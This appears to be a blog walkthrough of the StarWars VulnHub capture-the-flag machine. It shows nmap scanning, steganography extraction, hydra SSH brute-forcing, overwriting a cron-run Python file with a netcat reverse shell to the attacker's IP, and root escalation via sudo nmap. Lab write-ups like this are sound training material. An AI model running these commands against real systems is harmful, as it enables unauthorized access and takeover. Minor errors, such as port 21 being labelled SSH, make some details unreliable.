StarWars Vulnhub Walkthrough

StarWars is a beginner level virtual machine created by Sir Logic. this is another boot to root challenge. It’s available at VulnHub for penetration testing and you can download it from here

Network Scanning

Let’s start with arp scanning discovering our target IP address using the netdiscover command. there have many arp scanning tools but I use always Nmap and netdiscover.

sudo netdiscover
StarWars Vulnhub Walkthrough

Now we have our target IP Address, the next step is to scan the target machine by using the Nmap tool. This is to find the open ports and services on the target machine

nmap -sV -sC 192.168.43.233

As we can see from this output we have two ports open. we saw the port 22 and 80 are open. We have the 21/SSH Service as well as an 80/HTTP Service on the server.

Enumeration

we navigate to a web browser and explored the host IP address and we see two same images and an comment ( Password you shall find ).

http://192.168.43.233
StarWars Vulnhub Walkthrough

After reading the page source code and we found a base64 string. but not useful. then I download the image of our local system and starting the stenography image file I use different types of tools but they didn’t give me the right output.

I’m stuck here then I Found a ruby tool zsteg ( detect stegano-hidden data in PNG & BMP ) using the command you can download the tool.

sudo get install zsteg
zsteg -a yoga.png
StarWars Vulnhub Walkthrough

After extract the image hidden data we found a password but we need a username. for more details again i started enumeration on port 80 and by checking robots.txt file we found an directory /r2d2

http://192.168.43.233/robots.txt
StarWars Vulnhub Walkthrough

but there is nothing useful using the cewl tool I create a word-list by using the command.

sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt
http://192.168.43.233/r2d2
StarWars Vulnhub Walkthrough

I try the wordlist for ssh username. after spending one hour we couldn’t found any possible username then I search google for ( StarWars wordlist ) and I found a word-list you can download here the wordlists link and again try a new user list.

sudo vi user.txt
hydra -L user.txt -p "babyYoda123" 192.168.43.233 ssh

After 217 tries hydra discover a possible username and password then now try to log in ssh server.

ssh [email protected]

now I’m starting enumerating the user directory and i found a secrets notes file After i read the note.txt i see a hind Anakin is a cewl kid.

ls -lsa
cd .secrets/
ls
cat note.txt

and I found a group name anakin and there are two users Darth,skywalker

cat /etc/group |grep anakin

again I run the cewl tool for creating a new word-list and cread a usernames file using these command and again starting SSH brute-forcing.

sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt
ls
sudo echo -e "Darth\nskywalker" > /tmp/user.txt
sudo hydra -L /tmp/user.txt -P word-pass.txt ssh://192.168.43.233

as we see again we found a valid username an password. i change our current user by using su ( switch user ) command and again we found a secrets note.txt file

su skywalker
cd ~/
ls -lsa
cd .secrets/
cat note.txt
StarWars Vulnhub Walkthrough

after reading the note.txt file we move the Darth home directory and there I found a python file after reading the file we see a message this file is automatically run every minute and the Anakin group have read-write permission this file

cd /home/Darth/
cd .secrets/
cat evil.py

so I edit and creating a netcat reverse shell by using these commands but first we open a new console window and starting netcat listener any port.

nc -lvp 77
echo -e 'import os\nos.system("nc 192.168.43.103 77 -e /bin/bash")' > evil.py
cat evil.py
StarWars Vulnhub Walkthrough

After a minute we got reverse connection target machine and our user is changed to skywalker to Darth

sudo nc -lvp 77
sudo -l

Privilege Escaltion

Let run the sudo -l command to enumerate if this user can run some application with root privileges and without a password.  and We found Darth user can run the Nmap command. I already read Nmap privilege escalation without wasting our time I run the privilege escalation command one by one.

var=$(mktemp)
echo 'os.execute("/bin/bash")' > $var
sudo nmap --script=$var

Now we have root shell target machine let’s move the root directory and read the our final flag.

cd /root
ls
cat flag.txt
StarWars Vulnhub Walkthrough

Tre: 1 link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →